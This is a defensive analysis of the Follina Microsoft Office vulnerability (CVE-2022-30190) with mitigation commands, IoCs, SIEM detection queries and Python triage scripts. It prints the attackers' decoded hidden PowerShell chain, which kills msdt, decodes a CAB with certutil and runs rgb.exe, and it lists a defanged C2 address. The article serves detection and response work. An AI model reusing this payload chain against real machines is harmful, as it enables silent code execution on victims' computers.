A zero-day vulnerability has been discovered in Microsoft Office that allows code execution on a victim's machine through a malicious Word document. The vulnerability, assigned the identifier CVE-2022-30190, was named "Follina". The Follina 0-day allows remote code execution on Windows machines. The exploit abuses MSDT (Microsoft Support Diagnostic Tool), a built-in Windows utility also called the Diagnostics Troubleshooting Wizard. It is located under the System32 folder, and when there is a problem on the computer it directs the user to the support page together with the machine information. The vulnerability stems from exactly this behaviour: by editing the target that MSDT will be directed to, the attacker can point the tool at a URL of his choosing and run the malicious commands embedded in the document.
Word documents are frequently used in phishing attacks: PowerShell commands injected into the macros of a Word file can give remote code execution, manipulate the registry for persistence, delete audit logs through a scheduled task created in the background, and redirect to an external IP.
The Follina vulnerability is a critical 0-day that allows PowerShell scripts to run even when macros are not enabled. Let's examine the actions of the vulnerability according to the Huntress analysis.
MALICIOUS WORD FILE ANALYSIS
- When we unzip the archive of the malicious Word document, a file with the .xml.rels extension is obtained. When we check the content of the .xml.rels file, we see that the Target attribute redirects to an external URL.
- If we examine the content of the RDF842l.html file: Windows' PCWDiagnostic package is called through the ms-msdt scheme, and PowerShell commands are passed by including the IT_BrowseForFile parameter. The PowerShell commands include a command encoded with base64. Let's decode the command.
- According to tests conducted by security researcher Kevin Beaumont, the PowerShell command still ran even when macros were disabled in the Word document used for the Follina 0-day.
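The two artefacts described above (an external Target in the document's .xml.rels, and MSDT indicators in the fetched HTML) can be checked mechanically during triage. The script below is an added example written for this page, not code from the Huntress analysis: it opens a .docx from memory, lists every relationship marked TargetMode="External", flags an oleObject relationship that points at a remote URL or any target using the ms-msdt: handler, and scans an HTML payload for the indicator strings. The sample relationships, the example.invalid host and the HTML stand-in are constructed for the demonstration; the real parameter value is replaced by a placeholder.

```python
"""Triage a .docx for the Follina relationship pattern (added example, not from the page)."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
DOCUMENT_RELS = "word/_rels/document.xml.rels"   # the .xml.rels file the analysis refers to

# Strings the page associates with the MSDT chain inside the fetched HTML
MSDT_INDICATORS = ("ms-msdt:", "PCWDiagnostic", "IT_BrowseForFile", "IT_RebrowseForFile")


def external_targets(docx_bytes):
    """Return (Id, Type, Target) for every relationship marked TargetMode="External"."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if DOCUMENT_RELS not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(DOCUMENT_RELS))
    found = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("TargetMode", "Internal").lower() == "external":
            found.append((rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")))
    return found


def triage_docx(docx_bytes):
    """Flag external OLE objects (remote HTML pulled into Word) and ms-msdt: targets."""
    findings = []
    for rel_id, rel_type, target in external_targets(docx_bytes):
        if rel_type == f"{OOXML_REL}/oleObject":
            findings.append(f"{rel_id}: external OLE object fetched from {target}")
        if urlsplit(target).scheme.lower() == "ms-msdt":
            findings.append(f"{rel_id}: relationship target uses the ms-msdt: URL handler")
    return findings


def scan_html(html):
    """Return the MSDT indicators present in a fetched HTML payload, in a fixed order."""
    lowered = html.lower()
    return [ind for ind in MSDT_INDICATORS if ind.lower() in lowered]


def build_sample_docx(rels_xml):
    """Constructed minimal .docx (just enough parts for the triage) built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(DOCUMENT_RELS, rels_xml)
    return buf.getvalue()


# Constructed sample relationships: one internal part, one ordinary hyperlink,
# and one oleObject pulled from an external URL (the Follina pattern; host is a placeholder).
SUSPECT_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OOXML_REL}/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OOXML_REL}/hyperlink" Target="https://example.invalid/" TargetMode="External"/>
  <Relationship Id="rId3" Type="{OOXML_REL}/oleObject" Target="http://example.invalid/RDF842l.html!" TargetMode="External"/>
</Relationships>"""

CLEAN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OOXML_REL}/styles" Target="styles.xml"/>
</Relationships>"""

# Constructed stand-in for the fetched HTML; the real parameter value is replaced by a placeholder.
SUSPECT_HTML = '<script>window.location.href = "ms-msdt:/id PCWDiagnostic IT_BrowseForFile=<REDACTED>";</script>'


if __name__ == "__main__":
    for line in triage_docx(build_sample_docx(SUSPECT_RELS)):
        print(line)
    print("HTML indicators:", scan_html(SUSPECT_HTML))
```

An ordinary hyperlink with TargetMode="External" is listed but not flagged, so the check separates normal documents from one that embeds a remote OLE object; a document whose relationships are all internal produces no findings at all.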
The decoded code's actions are as follows:
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; → Runs cmd in the background. If any msdt.exe processes are running, it kills them.
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe"; → With a loop, the encoded data found in 05-2022-0438.rar is stored in the 1.t file, the decoded version is stored in the 1.c file, and then the rgb.exe process is run. Here the decoding feature of the certutil command is used (the string TVNDRgAAAA that findstr looks for is the base64 encoding of the CAB header "MSCF" followed by null bytes, which is why the decoded 1.c can be unpacked with expand).
While WINWORD.EXE is running, the desired PowerShell commands are executed as a child process of it.
To summarize: using the msdt tool, a redirection can be made to a desired external source; the desired packages can be included in the code via the window.location object in JavaScript, and PowerShell commands can be run. In this vulnerability, PowerShell scripts can be run without opening the Word file or activating macros. As a temporary workaround, the MSDT URL protocol can be deleted from the registry. The registry key should be backed up beforehand.
Disabling the MSDT URL Protocol:
→ Start cmd as Administrator.
→ Back up the registry key with the command "reg export HKEY_CLASSES_ROOT\ms-msdt filename".
→ Delete the msdt URL protocol from the registry with the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f".
If you want to reactivate the msdt URL protocol, import it into the registry again with the following command.
→ Start cmd as Administrator.
→ reg import "filename"
If you do not want to delete the msdt URL protocol from the registry, Microsoft Defender should be updated to the latest version.
Follina 0-day IoCs
52945af1def85b171870b31fa4782e52
8ee8fe6f0226e346e224cd72c728157c
6bcee92ab337c9130f27143cc7be5a55
f531a7c270d43656e34d578c8e71bc39
529c8f3d6d02ba996357aba535f688fc
d313002804198b5af1e0b537799be348
4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
C2 Server: 141[.]105.65.149
C2 URL: www.xmlformats[.]com
Anomaly Detection in Security Products
Microsoft Defender
DeviceProcessEvents | where ((ProcessCommandLine contains "WINWORD.EXE") and (ProcessCommandLine contains "msdt.exe") and (ProcessCommandLine contains "sdiagnhost.exe" or ProcessCommandLine contains "csc.exe" or ProcessCommandLine contains "PCWDiagnostic" or ProcessCommandLine contains "IT_RebrowseForFile" or ProcessCommandLine contains "IT_BrowseForFile" or ProcessCommandLine contains "conhost.exe"))
Splunk
[Doc Malware]
alert.severity = 2
description = Detection (Rule ID: 74566a6a66aaasdq2ed)
cron_schedule = 0 * * * *
disabled = 1
is_scheduled = 1
is_visible = 1
dispatch.earliest_time = -60m@m
dispatch.latest_time = now
search = (source="WinEventLog:*" AND CommandLine="*WINWORD.EXE*" AND CommandLine="*msdt.exe*" AND (CommandLine="*sdiagnhost.exe*" OR CommandLine="*csc.exe*" OR CommandLine="*PCWDiagnostic*" OR CommandLine="*IT_RebrowseForFile*" OR CommandLine="*IT_BrowseForFile*" OR CommandLine="*conhost.exe*"))
alert.suppress = 0
alert.track = 1
QRadar
SELECT UTF8(payload) FROM events WHERE LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' AND ("Process CommandLine" ILIKE '%WINWORD.EXE%') AND ("Process CommandLine" ILIKE '%msdt.exe%') AND ("Process CommandLine" ILIKE '%sdiagnhost.exe%' OR "Process CommandLine" ILIKE '%csc.exe%' OR "Process CommandLine" ILIKE '%PCWDiagnostic%' OR "Process CommandLine" ILIKE '%IT_RebrowseForFile%' OR "Process CommandLine" ILIKE '%IT_BrowseForFile%' OR "Process CommandLine" ILIKE '%conhost.exe%')
Graylog
(CommandLine.keyword:WINWORD.EXE AND CommandLine.keyword:msdt.exe AND CommandLine.keyword:(sdiagnhost.exe csc.exe PCWDiagnostic IT_RebrowseForFile IT_BrowseForFile conhost.exe))
Sumo Logic
_sourceCategory=windows | where CommandLine matches "*WINWORD.EXE*" and CommandLine matches "*msdt.exe*" and (CommandLine matches "*sdiagnhost.exe*" or CommandLine matches "*csc.exe*" or CommandLine matches "*PCWDiagnostic*" or CommandLine matches "*IT_RebrowseForFile*" or CommandLine matches "*IT_BrowseForFile*" or CommandLine matches "*conhost.exe*")
Elastic Query
(process.command_line:WINWORD.EXE AND process.command_line:msdt.exe AND process.command_line:(sdiagnhost.exe OR csc.exe OR PCWDiagnostic OR IT_RebrowseForFile OR IT_BrowseForFile OR conhost.exe))
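All of the platform queries above encode the same rule: WINWORD.EXE and msdt.exe must both appear, together with at least one MSDT artifact. The script below is an added example written for this page (not a vendor rule and not code from the original post) that applies that rule to constructed Sysmon-style process-creation events so the logic can be tested offline. One assumption is stated in the code: the rule is evaluated over the parent and child image and command-line fields together, because a single process command line rarely names both WINWORD.EXE and msdt.exe; the paths, record ids and the redacted parameter value are illustrative.

```python
"""Evaluate the page's Follina process rule over constructed process-creation events
(added example, not from the page or from any vendor)."""

# Same indicator set as the platform queries above, compared case-insensitively
PARENT_INDICATOR = "winword.exe"
CHILD_INDICATOR = "msdt.exe"
MSDT_ARTIFACTS = ("sdiagnhost.exe", "csc.exe", "pcwdiagnostic",
                  "it_rebrowseforfile", "it_browseforfile", "conhost.exe")


def matches_follina_rule(event):
    """True when WINWORD.EXE, msdt.exe and at least one MSDT artifact all appear.

    Assumption: the rule is evaluated over the parent and child image/command-line
    fields together, since a single process command line rarely names both binaries."""
    haystack = " ".join(
        str(event.get(k, "")) for k in ("ParentImage", "ParentCommandLine", "Image", "CommandLine")
    ).lower()
    return (PARENT_INDICATOR in haystack
            and CHILD_INDICATOR in haystack
            and any(a in haystack for a in MSDT_ARTIFACTS))


def hunt(events):
    """Return the RecordIds of the events that trip the rule."""
    return [e["RecordId"] for e in events if matches_follina_rule(e)]


# Constructed Sysmon-style process-creation events (paths and values are illustrative)
SAMPLE_EVENTS = [
    {  # Word itself being started from Explorer: no msdt, no match
        "RecordId": "evt-1",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\invoice.docx"',
    },
    {  # Word launching msdt.exe through the ms-msdt handler: the Follina pattern
        "RecordId": "evt-2",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ParentCommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\invoice.docx"',
        "Image": r"C:\Windows\System32\msdt.exe",
        "CommandLine": r'"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic IT_BrowseForFile=<REDACTED>',
    },
    {  # msdt.exe started by the Control Panel troubleshooter: legitimate, no Word parent
        "RecordId": "evt-3",
        "ParentImage": r"C:\Windows\System32\control.exe",
        "ParentCommandLine": r'"C:\Windows\System32\control.exe" /name Microsoft.Troubleshooting',
        "Image": r"C:\Windows\System32\msdt.exe",
        "CommandLine": r'"C:\WINDOWS\system32\msdt.exe" /id PCWDiagnostic',
    },
]


if __name__ == "__main__":
    print("alerts:", hunt(SAMPLE_EVENTS))   # ['evt-2']
```

The third event shows why the WINWORD.EXE condition matters: msdt.exe with the PCWDiagnostic package is a normal troubleshooter launch when the parent is the Control Panel, and only the Word-parented instance is reported. When mapping this into a SIEM, make sure the parent process fields are ingested; if only the child command line is indexed, the WINWORD.EXE condition will rarely be satisfied and the rule stays silent.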